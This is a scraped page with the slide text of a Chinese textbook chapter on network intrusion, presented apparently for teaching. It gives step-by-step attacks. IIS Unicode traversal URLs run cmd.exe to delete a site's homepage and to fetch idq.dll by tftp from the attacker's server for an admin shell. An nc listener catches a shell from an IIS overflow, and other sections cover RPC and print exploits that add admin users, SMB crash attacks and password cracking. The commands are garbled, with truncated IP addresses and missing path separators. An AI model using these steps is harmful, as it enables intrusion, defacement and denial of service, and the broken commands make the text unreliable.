




已閱讀5頁(yè),還剩62頁(yè)未讀, 繼續(xù)免費(fèi)閱讀
版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
第五章 網(wǎng)絡(luò)入侵,5,內(nèi)容提要,本章是攻擊技術(shù)中最重要的一章,介紹目前常用的網(wǎng)絡(luò)攻擊手段: 社會(huì)工程學(xué)攻擊 物理攻擊 暴力攻擊 利用Unicode漏洞攻擊 利用緩沖區(qū)溢出漏洞進(jìn)行攻擊等技術(shù)。 并結(jié)合實(shí)際,介紹流行的攻擊工具的使用以及部分工具的代碼實(shí)現(xiàn)。,社會(huì)工程學(xué)攻擊,社交工程是使用計(jì)謀和假情報(bào)去獲得密碼和其他敏感信息的科學(xué),研究一個(gè)站點(diǎn)的策略其中之一就是盡可能多的了解這個(gè)組織的個(gè)體,因此黑客不斷試圖尋找更加精妙的方法從他們希望滲透的組織那里獲得信息。 舉個(gè)例子:一組高中學(xué)生曾經(jīng)想要進(jìn)入一個(gè)當(dāng)?shù)氐墓镜挠?jì)算機(jī)網(wǎng)絡(luò),他們擬定了一個(gè)表格,調(diào)查看上去顯得是無(wú)害的個(gè)人信息,例如所有秘書(shū)和行政人員和他們的配偶、孩子的名字,這些從學(xué)生轉(zhuǎn)變成的黑客說(shuō)這種簡(jiǎn)單的調(diào)查是他們社會(huì)研究工作的一部分。利用這份表格這些學(xué)生能夠快速的進(jìn)入系統(tǒng),因?yàn)榫W(wǎng)絡(luò)上的大多數(shù)人是使用寵物和他們配偶名字作為密碼。,社會(huì)工程學(xué)攻擊,目前社會(huì)工程學(xué)攻擊主要包括兩種方式:打電話(huà)請(qǐng)求密碼和偽造Email 1、打電話(huà)請(qǐng)求密碼 盡管不像前面討論的策略那樣聰明,打電話(huà)尋問(wèn)密碼也經(jīng)常奏效。在社會(huì)工程中那些黑客冒充失去密碼的合法雇員,經(jīng)常通過(guò)這種簡(jiǎn)單的方法重新獲得密碼。 2、偽造Email 使用telnet一個(gè)黑客可以截取任何一個(gè)身份證發(fā)送Email的全部信息,這樣的Email消息是真的,因?yàn)樗l(fā)自于一個(gè)合法的用戶(hù)。在這種情形下這些信息顯得是絕對(duì)的真實(shí)。黑客可以偽造這些。一個(gè)冒充系統(tǒng)管理員或經(jīng)理的黑客就能較為輕松的獲得大量的信息,黑客就能實(shí)施他們的惡意陰謀。,物理攻擊與防范,物理安全是保護(hù)一些比較重要的設(shè)備不被接觸。 物理安全比較難防,因?yàn)楣敉鶃?lái)自能夠接觸到物理設(shè)備的用戶(hù)。,案例5-1得到管理員密碼,用戶(hù)登錄以后,所有的用戶(hù)信息都存儲(chǔ)在系統(tǒng)的一個(gè)進(jìn)程中,這個(gè)進(jìn)程是:“winlogon.exe”,可以利用程序?qū)?dāng)前登錄用戶(hù)的密碼解碼出來(lái),如圖5-1所示。,案例5-1得到管理員密碼,使用FindPass等工具可以對(duì)該進(jìn)程進(jìn)行解碼,然后將當(dāng)前用戶(hù)的密碼顯示出來(lái)。將FindPass.exe拷貝到C盤(pán)根目錄,執(zhí)行該程序,將得到當(dāng)前用戶(hù)得登錄名,如圖5-2所示。,權(quán)限提升,有時(shí)候,管理員為了安全,給其他用戶(hù)建立一個(gè)普通用戶(hù)帳號(hào),認(rèn)為這樣就安全了。 其實(shí)不然,用普通用戶(hù)帳號(hào)登錄后,可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個(gè)具有管理員權(quán)限的用戶(hù)。,案例5-2 普通用戶(hù)建立管理員帳號(hào),利用Hacker帳戶(hù)登錄系統(tǒng),在系統(tǒng)中執(zhí)行程序GetAdmin.exe,程序自動(dòng)讀取所有用戶(hù)列表,在對(duì)話(huà)框中點(diǎn)擊按鈕“New”,在框中輸入要新建的管理員組的用戶(hù)名,如圖5-5所示。,普通用戶(hù)建立管理員帳號(hào),輸入一個(gè)用戶(hù)名“IAMHacker”,點(diǎn)擊按鈕“確定”以后,然后點(diǎn)擊主窗口的按鈕“OK”,出現(xiàn)添加成功的窗口,如圖5-6所示。,暴力攻擊,暴力攻擊的一個(gè)具體例子是,一個(gè)黑客試圖使用計(jì)算機(jī)和信息去破解一個(gè)密碼。 一個(gè)黑客需要破解段單一的被用非對(duì)稱(chēng)密鑰加密的信息,為了破解這種算法,一個(gè)黑客需要求助于非常精密復(fù)雜的方法,它使用120個(gè)工作站,兩個(gè)超級(jí)計(jì)算機(jī)利用從三個(gè)主要的研究中心獲得的信息,即使擁有這種配備,它也將花掉八天的時(shí)間去破解加密算法,實(shí)際上破解加密過(guò)程八天已是非常短暫的時(shí)間了。,字典文件,一次字典攻擊能否成功,很大因素上決定與字典文件。一個(gè)好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計(jì)算機(jī),可以根據(jù)公司管理員的姓氏以及家人的生日,可以作為字典文件的一部分,公司以及部門(mén)的簡(jiǎn)稱(chēng)一般也可以作為字典文件的一部分,這樣可以大大的提高破解效率。 一個(gè)字典文件本身就是一個(gè)標(biāo)準(zhǔn)的文本文件,其中的每一行就代表一個(gè)可能的密碼。目前有很多工具軟件專(zhuān)門(mén)來(lái)創(chuàng)建字典文件,圖5-8是一個(gè)簡(jiǎn)單的字典文件。,暴力破解操作系統(tǒng)密碼,字典文件為暴力破解提供了一條捷徑,程序首先通過(guò)掃描得到系統(tǒng)的用戶(hù),然后利用字典中每一個(gè)密碼來(lái)登錄系統(tǒng),看是否成功,如果成功則將密碼顯示 案例5-3 暴力破解操作系統(tǒng)密碼 比如使用圖5-8所示的字典文件,利用上一章介紹的工具軟件GetNTUser依然可以將管理員密碼破解出來(lái),如圖5-9所示。,暴力破解郵箱密碼,郵箱的密碼一般需要設(shè)置到八位以上,否則七位以下的密碼容易被破解。 尤其七位全部是數(shù)字,更容易被破解。 案例5-4 電子郵箱暴力破解 破解電子郵箱密碼,一個(gè)比較著名的工具軟件是:黑雨P(guān)OP3郵箱密碼暴力破解器,比較穩(wěn)定的版本是2.3.1,主界面如圖5-10所示。,暴力破解軟件密碼,目前許多軟件都具有加密的功能,比如Office文檔、Winzip文檔和Winrar文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數(shù)不夠長(zhǎng)的話(huà),同樣容易被破解。 案例5-5 Office文檔暴力破解,修改權(quán)限密碼,在對(duì)話(huà)框中選擇選項(xiàng)卡“安全性”,在打開(kāi)權(quán)限密碼和修改權(quán)限密碼的兩個(gè)文本框中都輸入“999”,如圖5-12所示。,輸入密碼,保存并關(guān)閉該文檔,然后再打開(kāi),就需要輸入密碼了,如圖5-13所示。,破解Word文檔密碼,該密碼是三位的,使用工具軟件,Advanced Office XP Password Recovery可以快速破解Word文檔密碼,主界面如圖5-14所示。,破解Word文檔密碼,點(diǎn)擊工具欄按鈕“Open File”,打開(kāi)剛才建立的Word文檔,程序打開(kāi)成功后會(huì)在Log Window中顯示成功打開(kāi)的消息,如圖5-15所示。,破解Word文檔密碼,設(shè)置密碼長(zhǎng)度最短是一位,最長(zhǎng)是三位,點(diǎn)擊工具欄開(kāi)始的圖標(biāo),開(kāi)始破解密碼,大約兩秒鐘后,密碼被破解了,如圖5-16所示。,Unicode漏洞專(zhuān)題,通過(guò)打操作系統(tǒng)的補(bǔ)丁程序,就可以消除漏洞。只要是針對(duì)漏洞進(jìn)行攻擊的案例都依賴(lài)于操作系統(tǒng)是否打了相關(guān)的補(bǔ)丁。 Unicode漏洞是2000-10-17發(fā)布的,受影響的版本: Microsoft IIS 5.0+Microsoft Windows 2000系列版本 Microsoft IIS 4.0+ Microsoft Windows NT 4.0 消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁,只要安裝了SP1以后,該漏洞就不存在了。微軟IIS 4.0和5.0都存在利用擴(kuò)展UNICODE字符取代“/“和“而能利用“/“目錄遍歷的漏洞。,Unicode漏洞的檢測(cè)方法,使用掃描工具來(lái)檢測(cè)Unicode漏洞是否存在,使用上一章介紹的X-Scan來(lái)對(duì)目標(biāo)系統(tǒng)進(jìn)行掃描,目標(biāo)主機(jī)IP為:09,Unicode漏洞屬于IIS漏洞,所以這里只掃描IIS漏洞就可以了,X-Scan設(shè)置如圖5-17所示。,Unicode漏洞的檢測(cè)方法,將主機(jī)添加到目標(biāo)地址,掃描結(jié)果如圖5-18所示。,Unicode漏洞的檢測(cè)方法,可以看出,存在許多系統(tǒng)的漏洞。只要是/scripts開(kāi)頭的漏洞都是Unicode漏洞。比如: /scripts/%c0%2f/winnt/system32/cmd.exe?/c+dir 其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個(gè)有執(zhí)行程序權(quán)限的一個(gè)目錄,在IIS中的位置如圖5-19所示。,Unicode漏洞的檢測(cè)方法,scripts目錄一般系統(tǒng)盤(pán)根目錄下的Inetpub目錄下,如圖5-20所示。,Unicode漏洞的檢測(cè)方法,在Windows的目錄結(jié)構(gòu)中,可以使用兩個(gè)點(diǎn)和一個(gè)斜線(xiàn)“/”來(lái)訪(fǎng)問(wèn)上一級(jí)目錄,在瀏覽器中利用“scripts/”可以訪(fǎng)問(wèn)到系統(tǒng)盤(pán)根目錄,訪(fǎng)問(wèn)“scripts/winnt/system32”就訪(fǎng)問(wèn)到系統(tǒng)的系統(tǒng)目錄了,在system32目錄下包含許多重要的系統(tǒng)文件,比如cmd.exe文件,可以利用該文件新建用戶(hù),刪除文件等操作。 瀏覽器地址欄中禁用符號(hào)“/”,但是可以使用符號(hào)“/”的Unicode的編碼。比如 “/scripts/%c0%2f/winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語(yǔ)句是執(zhí)行dir命令列出目錄結(jié)構(gòu)。,Unicode漏洞,此漏洞從中文IIS4.0+SP6開(kāi)始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,臺(tái)灣繁體中文也同樣存在這樣的漏洞。在NT4中/編碼為“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。 但從國(guó)外某些站點(diǎn)得來(lái)的資料顯示,還有以下的編碼可以實(shí)現(xiàn)對(duì)該漏洞的檢測(cè),該編碼存在于日文版、韓文版等操作系統(tǒng)。 %c1%pc %c0%9v %c0%qf %c1%8s %e0%80%af 利用該漏洞讀取出計(jì)算機(jī)上目錄列表,比如讀取C盤(pán)的目錄,只要在瀏覽器中輸入 “09/scripts/%c0%2f/winnt/system32/cmd.exe?/c+dir+c:”,利用Unicode漏洞讀取系統(tǒng)盤(pán)目錄,利用Unicode漏洞讀取系統(tǒng)盤(pán)目錄,利用語(yǔ)句得到對(duì)方計(jì)算機(jī)上裝了幾個(gè)操作系統(tǒng)以及操作系統(tǒng)的類(lèi)型,只要讀取C盤(pán)下的boot.ini文件就可以了。使用的語(yǔ)句是: 09/scripts/%c0%2f/winnt/system32/cmd.exe?/c+type+c:boot.ini 執(zhí)行的結(jié)果如圖5-22所示。,利用Unicode漏洞刪除主頁(yè),利用Unicode可以方便的更改對(duì)方的主頁(yè),比如現(xiàn)在已經(jīng)知道對(duì)方網(wǎng)站的根路徑在“C:Initpubwwwroot”(系統(tǒng)默認(rèn))下,可以刪除該路徑下的文件“default.asp”來(lái)刪除主頁(yè),這里的“default.asp”文件是IIS的默認(rèn)啟動(dòng)頁(yè)面。 使用的語(yǔ)句是: 09/scripts/%c0%2f/winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp,利用Unicode漏洞刪除主頁(yè),拷貝文件,為了是使用方便,利用語(yǔ)句將cmd.exe文件拷貝到scripts目錄,并改名為c.exe,使用的語(yǔ)句是: 09/scripts/%c0%2f/winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe 程序執(zhí)行結(jié)果如圖5-24所示。,查看C盤(pán)的目錄,以后使用cmd.exe命令就方便了,比如查看C盤(pán)的目錄,使用的語(yǔ)句就可以簡(jiǎn)化為: 09/scripts/c.exe?/c+dir+c: 執(zhí)行的結(jié)果如圖5-25所示。,利用Unicode漏洞入侵系統(tǒng),在地址欄上執(zhí)行命令,用戶(hù)的權(quán)限比較低,像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode可以入侵對(duì)方的系統(tǒng),并得到管理員權(quán)限。首先需要向?qū)Ψ椒?wù)器上傳一些文件,入侵的第一步,建立tftp服務(wù)器,向?qū)Ψ降膕cripts文件夾傳幾個(gè)文件。 需要上傳一個(gè)名為“idq.dll”的文件,為了上傳這個(gè)文件,首先在本地計(jì)算機(jī)上搭建一個(gè)TFTP服務(wù)器,普通文件傳輸協(xié)議TFTP(Text File Transmission Protocol)一般用來(lái)傳輸單個(gè)文件。使用工具軟件tftpd32.exe建立服務(wù)器。將idq.dll和tftpd32.exe放在本地的同一目錄下,執(zhí)行tftpd32.exe程序,主界面如圖5-26所示。,利用Unicode漏洞入侵系統(tǒng),利用Unicode漏洞入侵系統(tǒng),這樣在本地的TFTP的服務(wù)器就建立好了,保留這個(gè)窗口,通過(guò)該服務(wù)器向?qū)Ψ絺鬟fidq.dll文件。在瀏覽器中執(zhí)行命令: “09/scripts/%c0%2f/winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”, 命令其實(shí)是“tftp i 10 get idq.dll”意思是從10服務(wù)器上獲取idq.dll文件,執(zhí)行成功的界面如圖5-27所示。,上載文件,查看scripts目錄,上傳完畢后可以查看一下scripts目錄,是否真的上傳成功了。如圖5-28所示。,入侵對(duì)方主機(jī),說(shuō)明已經(jīng)成功的在scripts目錄中上傳了一個(gè)idq.dll文件,下面使用工具軟件ispc.exe入侵對(duì)方系統(tǒng)。 拷貝ispc.exe文件到本地計(jì)算機(jī)的C盤(pán)根目錄,在DOS命令行下執(zhí)行命令: “ispc.exe 09/scripts/idq.dll”,連接成功后就直接進(jìn)入了對(duì)方的DOS命令行下,而且具有管理員權(quán)限,入侵的過(guò)程5-29所示。,建立用戶(hù),可以在對(duì)方計(jì)算機(jī)上做管理員可以做的一切事情,比如添加用戶(hù),建立一個(gè)用戶(hù)名為“Hacker123”,密碼也是“Hacker123”的用戶(hù),如圖5-30所示。,其他漏洞攻擊,利用打印漏洞 利用打印漏洞可以在目標(biāo)的計(jì)算機(jī)上添加一個(gè)具有管理員權(quán)限的用戶(hù)。經(jīng)過(guò)測(cè)試,該漏洞在SP2、SP3以及SP4版本上依然存在,但是不能保證100%入侵成功。 使用工具軟件:cniis.exe,使用的語(yǔ)法格式是:“cniis 09 0”,第一個(gè)參數(shù)是目標(biāo)的IP地址,第二參數(shù)是目標(biāo)操作系統(tǒng)的補(bǔ)丁號(hào),因?yàn)?9沒(méi)有打補(bǔ)丁,這里就是0??截恈niis.exe文件到C盤(pán)根目錄,執(zhí)行程序如圖5-31所示。,SMB致命攻擊,SMB(Session Message Block,會(huì)話(huà)消息塊協(xié)議)又叫做NetBIOS或LanManager協(xié)議,用于不同計(jì)算機(jī)之間文件、打印機(jī)、串口和通訊的共享和用于Windows平臺(tái)上提供磁盤(pán)和打印機(jī)的共享。 SMB協(xié)議版本有很多種,在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。 利用該協(xié)議可以進(jìn)行各方面的攻擊,比如可以抓取其他用戶(hù)訪(fǎng)問(wèn)自己計(jì)算機(jī)共享目錄的SMB會(huì)話(huà)包,然后利用SMB會(huì)話(huà)包登錄對(duì)方的計(jì)算機(jī)。下面介紹利用SMB協(xié)議讓對(duì)方操作系統(tǒng)系統(tǒng)重新啟動(dòng)或者藍(lán)屏。,致命攻擊,使用的工具軟件是:SMBDie V1.0,該軟件對(duì)打了SP3、SP4的計(jì)算機(jī)依然有效,必須打?qū)iT(mén)的SMB補(bǔ)丁,軟件的主界面如圖5-32所示。,致命攻擊,攻擊的時(shí)候,需要兩個(gè)參數(shù):對(duì)方的IP地址和對(duì)方的機(jī)器名,窗口中分別輸入這兩項(xiàng),如圖5-33所示。,致命攻擊,然后再點(diǎn)按鈕“Kill”,如果參數(shù)輸入沒(méi)有錯(cuò)誤的話(huà),對(duì)方計(jì)算機(jī)立刻重啟或藍(lán)屏,命中率幾乎100%,被攻擊的計(jì)算機(jī)藍(lán)屏界面如圖5-34所示。,緩沖區(qū)溢出攻擊,目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當(dāng)目標(biāo)操作系統(tǒng)收到了超過(guò)了它的最大能接收的信息量的時(shí)候,將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出,然后覆蓋了實(shí)際的程序數(shù)據(jù),緩沖區(qū)溢出使目標(biāo)系統(tǒng)的程序被修改,經(jīng)過(guò)這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個(gè)后門(mén)。 這項(xiàng)攻擊對(duì)技術(shù)要求比較高,但是攻擊的過(guò)程卻非常簡(jiǎn)單。緩沖區(qū)溢出原理很簡(jiǎn)單,比如程序:,緩沖區(qū)溢出攻擊,void function(char * szPara1) char buff16; strcpy(buffer, szPara1); 程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中,只要szPara1的長(zhǎng)度大于16,就會(huì)造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問(wèn)題的C語(yǔ)言函數(shù)還有:strcat()、gets()、scanf()等。,RPC漏洞溢出,遠(yuǎn)程過(guò)程調(diào)用RPC(Remote Procedure Call),是操作系統(tǒng)的一種消息傳遞功能,允許應(yīng)用程序呼叫網(wǎng)絡(luò)上的計(jì)算機(jī)。當(dāng)系統(tǒng)啟動(dòng)的時(shí)候,自動(dòng)加載RPC服務(wù)。可以在服務(wù)列表中看到系統(tǒng)的RPC服務(wù),如圖5-35所示。,利用RPC漏洞建立超級(jí)用戶(hù),RPC溢出漏洞,對(duì)SP4也適用,必須打?qū)S醚a(bǔ)丁。利用工具scanms.exe文件檢測(cè)RPC漏洞,該工具是ISS安全公司2003年7月30日發(fā)布的,運(yùn)行在命令行下用來(lái)檢測(cè)指定IP地址范圍內(nèi)機(jī)器是否已經(jīng)安裝了“DCOM RPC 接口遠(yuǎn)程緩沖區(qū)溢出漏洞(823980-MS03-026)”補(bǔ)丁程序。 如果沒(méi)有安裝補(bǔ)丁程序,該IP地址就會(huì)顯示出“VULN”。首先拷貝該文件到C盤(pán)根目錄,現(xiàn)在要檢查地址段09到10的主機(jī),執(zhí)行命令“scanms.exe 09-10”,檢查過(guò)程如圖5-36所示。,檢查緩沖區(qū)溢出漏洞,檢查緩沖區(qū)溢出漏洞,利用工具軟件attack.exe對(duì)09進(jìn)行攻擊。攻擊的結(jié)果將在對(duì)方計(jì)算機(jī)上建立一個(gè)具有管理員權(quán)限的用戶(hù),并終止了對(duì)方的RPC服務(wù)。 新建用戶(hù)的用戶(hù)名和密碼都是qing10,這樣就可以登錄對(duì)方計(jì)算機(jī)了,RPC服務(wù)停止操作系統(tǒng)將有許多功能不能使用,非常容易被管理員發(fā)現(xiàn),使用工具軟件OpenRpcSs.exe來(lái)給對(duì)方重啟RPC服務(wù)。攻擊的全過(guò)程如圖5-37所示。,攻擊的全過(guò)程,利用IIS溢出進(jìn)行攻擊,案例5-11 利用IIS溢出入侵系統(tǒng) 利用軟件Snake IIS溢出工具可以讓對(duì)方的IIS溢出,還可以捆綁執(zhí)行的命令和在對(duì)方計(jì)算機(jī)上開(kāi)辟端口,工具軟件的主界面如圖5-38所示。,利用IIS溢出進(jìn)行攻擊,該軟件適用于各種類(lèi)型的操作系統(tǒng),比如對(duì)09進(jìn)行攻擊,09的操作系統(tǒng)的Windows 2000,沒(méi)有安裝補(bǔ)丁程序,攻擊完畢后,開(kāi)辟一個(gè)813端口,并在對(duì)方計(jì)算機(jī)上執(zhí)行命令“dir c:”設(shè)置如圖5-39所示。,點(diǎn)擊按鈕“IDQ溢出”,出現(xiàn)攻擊成功的提示框,如圖5-40所示。,這個(gè)時(shí)候,813端口已經(jīng)開(kāi)放,利用工具軟件nc.exe連接到該端口,將會(huì)自動(dòng)執(zhí)行改才發(fā)送的DOS命令“dir c:”,使用的語(yǔ)法是:nc.exe -vv 09 813,其中-vv是程序的參數(shù),813是目標(biāo)端口??梢钥吹矫畹膱?zhí)行結(jié)果,如圖5-41所示。,監(jiān)聽(tīng)本地端口,下面利用nc.exe和snake工具的另外一種組合入侵對(duì)方計(jì)算機(jī)。首先利用nc.exe命令監(jiān)聽(tīng)本地的813端口。使用的基本語(yǔ)法是“nc -l -p 813”,執(zhí)行的過(guò)程如圖5-42所示。,這個(gè)窗口就這樣一直保留,啟動(dòng)工具軟件snake,本地的IP地址是10,要攻擊的計(jì)算機(jī)的IP地址是09,選擇溢出選項(xiàng)中的第一項(xiàng),設(shè)置IP為本地IP地址,端口是813,如圖5-43所示。,設(shè)置好以后,點(diǎn)擊按鈕“IDQ溢出”,程序顯示對(duì)話(huà)框如圖4-44所示。,查看nc命令的DOS框,在該界面下,已經(jīng)執(zhí)行了設(shè)置的DOS命令。將對(duì)方計(jì)算機(jī)的C盤(pán)根目錄列出來(lái),如圖4-45所示。,利用WebDav遠(yuǎn)程溢出,需要使用工具軟件nc.exe和webdavx3.exe,首先在DOS命令行下執(zhí)行webdavx3.exe,如果執(zhí)行的話(huà),該程序?qū)⑻崾疽呀?jīng)過(guò)期了,如圖4-46所示。,攻擊,修改本地系統(tǒng)時(shí)間到2001年,這樣就可以攻擊了,在命令后面直接跟對(duì)方的IP地址就可以了,現(xiàn)在要攻擊的計(jì)算機(jī)是09,執(zhí)行情況如圖4-47所示。,入侵對(duì)方的計(jì)算機(jī),該程序不能自動(dòng)退出,當(dāng)發(fā)
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 廈門(mén)塑膠跑道建設(shè)施工方案
- 洛陽(yáng)鏟水平向成孔施工方案
- 測(cè)量基礎(chǔ)數(shù)學(xué)試卷
- 2025至2030年中國(guó)后置機(jī)客車(chē)推拉操縱索總成數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2025至2030年中國(guó)低零度聚乙烯農(nóng)地膜數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2025至2030年中國(guó)三桿式執(zhí)手門(mén)鎖數(shù)據(jù)監(jiān)測(cè)研究報(bào)告
- 2025年中國(guó)湘殼蓮市場(chǎng)調(diào)查研究報(bào)告
- 鄂州漢白玉石欄桿施工方案
- 2024-2025學(xué)年高中歷史專(zhuān)題五走向世界的資本主義市場(chǎng)第1課開(kāi)辟文明交往的航線(xiàn)課后課時(shí)作業(yè)人民版必修2
- 第10課 《三峽》教學(xué)設(shè)計(jì)-2024-2025學(xué)年八年級(jí)語(yǔ)文上冊(cè)全新菜單型章節(jié)式同步備課(統(tǒng)編版)
- 2024肥胖癥診療指南亮點(diǎn)內(nèi)容解讀課件
- 2023阿里云ACA大數(shù)據(jù)復(fù)習(xí)題題庫(kù)及答案
- (新版)山東省物流工程師職稱(chēng)考試參考試題庫(kù)-下(多選、判斷題)
- 貨運(yùn)有限公司2024年春節(jié)后復(fù)工復(fù)產(chǎn)安全生產(chǎn)方案
- 課程設(shè)計(jì)存在問(wèn)題和建議
- 食品安全員專(zhuān)業(yè)知識(shí)考試題庫(kù)(含答案)
- 和客戶(hù)簽回款協(xié)議書(shū)范本
- 2024年孝感中小學(xué)教師招聘真題
- DBJ50-T-420-2022建設(shè)工程配建5G移動(dòng)通信基礎(chǔ)設(shè)施技術(shù)標(biāo)準(zhǔn)
- 2023年全國(guó)職業(yè)院校技能大賽-健身指導(dǎo)賽項(xiàng)規(guī)程
- 年“春節(jié)”前后安全自查系列用表完整
評(píng)論
0/150
提交評(píng)論